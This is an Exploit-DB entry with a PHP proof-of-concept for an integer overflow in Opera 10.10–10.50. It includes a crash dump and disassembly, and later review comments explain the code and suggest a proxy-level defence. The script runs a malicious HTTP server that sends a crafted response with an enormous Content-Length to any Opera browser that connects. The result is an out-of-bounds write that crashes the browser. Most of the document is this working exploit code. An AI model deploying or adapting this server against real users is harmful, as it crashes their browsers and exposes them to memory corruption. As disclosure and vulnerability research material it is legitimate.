Opera 10.50 - integer Overflow

EDB-ID:

11622




Platform:

Windows

Date:

2010-03-03


<?php

/*
*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
*-------------------------------------------------------------------------------
* Opera 10.10 - 10.50 
* Title: Integer overflow leading to out-of-bounds array access (R/W)
*        0day PoC
* Author: Marcin Ressel aka ~echo
* Date: 3.03.2010 
* Software: http://choice.opera.com/download/get.pl?thanks=true&sub=true&wu=1&wulang=pl&info=1
* Version: Tested on 10.10 and 10.50, but I think other versions are vulnerable too
* Platform: Windows xp home sp 2 pl
* Muz: http://totgeliebt.wrzuta.pl/audio/6dXgnLnsI82 (podniecilem sie) 
* Contact: pokoFac_nerda@tvn24.pl
*      
* @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
*
* Exception: Access violation when writing to [01A23000]
* Registers: EAX 03D89DF2
             ECX 3FFF3ABE
             EDX 00000002
             EBX FFFFFFFF
             ESP 0012F158
             EBP 0012F160
             ESI 03DBB2F8
             EDI 01A23000
             EIP 6781E0BA Opera_12.6781E0BA
  
* DUMP Function:
        6781E060   55               PUSH EBP
        6781E061   8BEC             MOV EBP,ESP
        6781E063   57               PUSH EDI
        6781E064   56               PUSH ESI
        6781E065   8B75 0C          MOV ESI,DWORD PTR SS:[EBP+C]
        6781E068   8B4D 10          MOV ECX,DWORD PTR SS:[EBP+10]
        6781E06B   8B7D 08          MOV EDI,DWORD PTR SS:[EBP+8]
        6781E06E   8BC1             MOV EAX,ECX
        6781E070   8BD1             MOV EDX,ECX
        6781E072   03C6             ADD EAX,ESI
        6781E074   3BFE             CMP EDI,ESI
        6781E076   76 08            JBE SHORT Opera_12.6781E080
        6781E078   3BF8             CMP EDI,EAX
        6781E07A   0F82 A4010000    JB Opera_12.6781E224
        6781E080   81F9 00010000    CMP ECX,100
        6781E086   72 1F            JB SHORT Opera_12.6781E0A7
        6781E088   833D 882AF167 00 CMP DWORD PTR DS:[67F12A88],0
        6781E08F   74 16            JE SHORT Opera_12.6781E0A7
        6781E091   57               PUSH EDI
        6781E092   56               PUSH ESI
        6781E093   83E7 0F          AND EDI,0F
        6781E096   83E6 0F          AND ESI,0F
        6781E099   3BFE             CMP EDI,ESI
        6781E09B   5E               POP ESI
        6781E09C   5F               POP EDI
        6781E09D   75 08            JNZ SHORT Opera_12.6781E0A7
        6781E09F   5E               POP ESI
        6781E0A0   5F               POP EDI
        6781E0A1   5D               POP EBP
        6781E0A2  ^E9 88CEFFFF      JMP Opera_12.6781AF2F
        6781E0A7   F7C7 03000000    TEST EDI,3
        6781E0AD   75 15            JNZ SHORT Opera_12.6781E0C4
        6781E0AF   C1E9 02          SHR ECX,2
        6781E0B2   83E2 03          AND EDX,3
        6781E0B5   83F9 08          CMP ECX,8
        6781E0B8   72 2A            JB SHORT Opera_12.6781E0E4
 BUG->  6781E0BA   F3:A5            REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]  <-- BUG 
        6781E0BC   FF2495 D4E18167  JMP DWORD PTR DS:[EDX*4+6781E1D4]
        6781E0C3   90               NOP
        6781E0C4   8BC7             MOV EAX,EDI
        6781E0C6   BA 03000000      MOV EDX,3
        6781E0CB   83E9 04          SUB ECX,4
        6781E0CE   72 0C            JB SHORT Opera_12.6781E0DC
        6781E0D0   83E0 03          AND EAX,3
        6781E0D3   03C8             ADD ECX,EAX
        6781E0D5   FF2485 E8E08167  JMP DWORD PTR DS:[EAX*4+6781E0E8]
        6781E0DC   FF248D E4E18167  JMP DWORD PTR DS:[ECX*4+6781E1E4]
        6781E0E3   90               NOP
        6781E0E4   FF248D 68E18167  JMP DWORD PTR DS:[ECX*4+6781E168]
        ...
*---------------------------------------------------------------------------
* BREAK AT 6781E0BA      
          ECX=3FFF3ABE (decimal 1073691326.)
          DS:[ESI]=[03DBB2F8]=00000000
          ES:[EDI]=[01A23000]=???
*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@        
*
*/
  // Pick the dl() filename suffix from the OS environment variable ("win" prefix -> Windows,
  // anything else -> 'nix').
  // NOTE(review): $_ENV['OS'] is typically unset on non-Windows hosts (and whenever
  // variables_order excludes E); substr() then yields '' and the script falls through to 'nix'.
  if(strtolower(substr($_ENV['OS'],0,3)) == "win") define('OS','win');
  else define('OS','nix');
     // NOTE(review): the sockets extension registers itself as 'sockets', not 'php_sockets', so
     // this check looks like it never recognises an already-loaded extension and always reaches
     // dl(); dl() failures are @-suppressed, so the only report is the die() below.
     if(!extension_loaded('php_sockets'))
     {  
        if((OS == 'win') && (!@dl('php_sockets.dll')) ||
          ((OS == 'nix') && (!@dl('php_sockets.so')))) 
            die('fatal php_sockets.[dll/so] '.
                'not loaded '."\r\n");            //.__line__.' '.__file__."\r\n");                                                    
     } 
  /*Generated by my own fuzzer*/  
  // Crafted HTTP/1.1 response that is written verbatim to whichever client connects below.
  // The header comment attributes the crash to an integer overflow of the Content-Length value:
  // a decimal string hundreds of digits long, far outside any 32/64-bit integer range (at the
  // recorded break the copy loop runs with ECX=0x3FFF3ABE). The remaining headers and the body
  // appear to be fuzzer filler. Defensive note: a proxy or IDS can reject such a response on
  // syntax alone, since a Content-Length the receiver cannot represent is malformed by definition.
  $EVIL = 'HTTP/1.1 200 ok'."\r\n".
          'Transfer-Encoding: identity'."\r\n".
          'Date: thu 28 dec 2003 12:4:33 gmt'."\r\n".
          'Server: moj zuy server'."\r\n".
          'Set-Cookie: psid=d6dd02e9957fb162d2385ca6f2829a73;path=C:/'."\r\n".
          'Content-Location: file://C:/boot.ini'."\r\n".
          'Vary:negotiate,accept-language,accept-charset'."\r\n".
          'Tcn: choice'."\r\n".
          'Last-modified: sun,21 nov 2010 22:22:22 gmt'."\r\n".
          'Etag: "3861-5c6-1b28fa80;386a-9dc-1b28fa80"'."\r\n".
          'Accept-Ranges: bytes'."\r\n".
          'Cache-Control: max-age=0'."\r\n".
          'Expires: mon, 22 feb 2010 18:31:20 gmt'."\r\n".
          'Content-Encoding: identity'."\r\n".
          'Content-Length:999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999666'."\r\n".
          'Via: 1.1 cache.zuo.pl:3128 (squid/2.7.stable6)'."\r\n".
          'Keep-Alive: timeout=15, max=300'."\r\n".
          'Connection: keep-alive'."\r\n".
          'Content-Type: text/html; charset=iso-8859-2'."\r\n".
          'Age: 1'."\r\n".
          'Allow: GET,HEAD'."\r\n".
          'Content-Disposition: inline'."\r\n".
          'Content-MD5: Q2hlY2sgSW50ZWdyaXR5IQ=='."\r\n".
          'Warning: 199 Miscellaneous warning'."\r\n".
          'Trailer: Max-Forwards'."\r\n".
          'Location: chrome://inspector/content/viewers/dom/dom.xul'."\r\n".
          'Content-Range: bytes 21010-47021/47022'."\r\n".
          'Content-Language: pl'."\r\n\r\n".
          '<html><head></head><body style="background-color:red;color:white;text-align:center;"><b>seq_end</b><script>location.href="http://swswqosksqowkd";</script></body></html>';
  // Command-line handling: the only recognised option is "-port N", scanned as flag/value pairs.
  $buster = $argc - 1;// number of user-supplied arguments ($argc counts the script name too)
  if($buster > 0)
  {
  // NOTE(review): when arguments are present but "-port" is missing (or its value is not a
  // positive int), $PORT is never assigned here and the default in the else branch is skipped,
  // so socket_create_listen() below receives an undefined variable. $PORT also keeps the raw
  // string form of the argument; the (int) cast is only applied to the > 0 test.
  for($i = 1; $i<$buster; $i+=2) 
      if(('-port' == $argv[$i]) && ((int)$argv[$i + 1] > 0)) $PORT = $argv[$i + 1];
  }
  else $PORT = 81;                                                                                                                                              
  // Listen on $PORT and hand the crafted response ($EVIL, built above) to the first client
  // that connects. Exactly one connection is served; the script then exits.
  if(!($SOCKET = socket_create_listen($PORT)))
                 die('fatal socket init failed'."\r\n");
  // 3 s receive timeout. NOTE(review): it is set on the listening socket; whether the accepted
  // socket inherits it is platform-dependent — confirm if the MSG_WAITALL recv below must not hang.
  socket_set_option($SOCKET,SOL_SOCKET,
                            SO_RCVTIMEO,array("sec"=>3,"usec"=>0));    
  echo('SOCKET READY AT PORT '.$PORT."\r\n".
       'Now connect here via opera'."\r\n");                                   
  // Blocks until a client connects.
  if($CONNECT = socket_accept($SOCKET))
  {
                $recv_buffer = null;
                echo('Connection ok '."\r\n");
                // Only 8 bytes of the request are read, just to confirm the client sent something;
                // the request is never parsed. MSG_WAITALL waits for all 8 bytes (or the timeout).
                if(socket_recv($CONNECT,$recv_buffer,8,/*msg_dontwait*/MSG_WAITALL))  
                {
                                // Write errors are @-suppressed; on failure both sockets are closed before die().
                                if(!@socket_write($CONNECT,$EVIL))
                                {
                                    socket_close($CONNECT);
                                    socket_close($SOCKET);      
                                    die('I cant send payload !'."\r\n"); 
                                }     
                } 
                else echo('Something wrong with client side'."\r\n");
                // Short pause, presumably so the response reaches the client before the socket is closed.
                usleep(120000);
                socket_close($CONNECT);
                socket_close($SOCKET);                                                                 
  }              
  // Printed regardless of whether a connection was ever accepted.
  echo('OK ya browser must be death now'."\r\n".
       'Have a nice day lol'."\r\n");   
                
//[2010-03-03 20:47:46]
//i cut be milion dolar man ;=
?>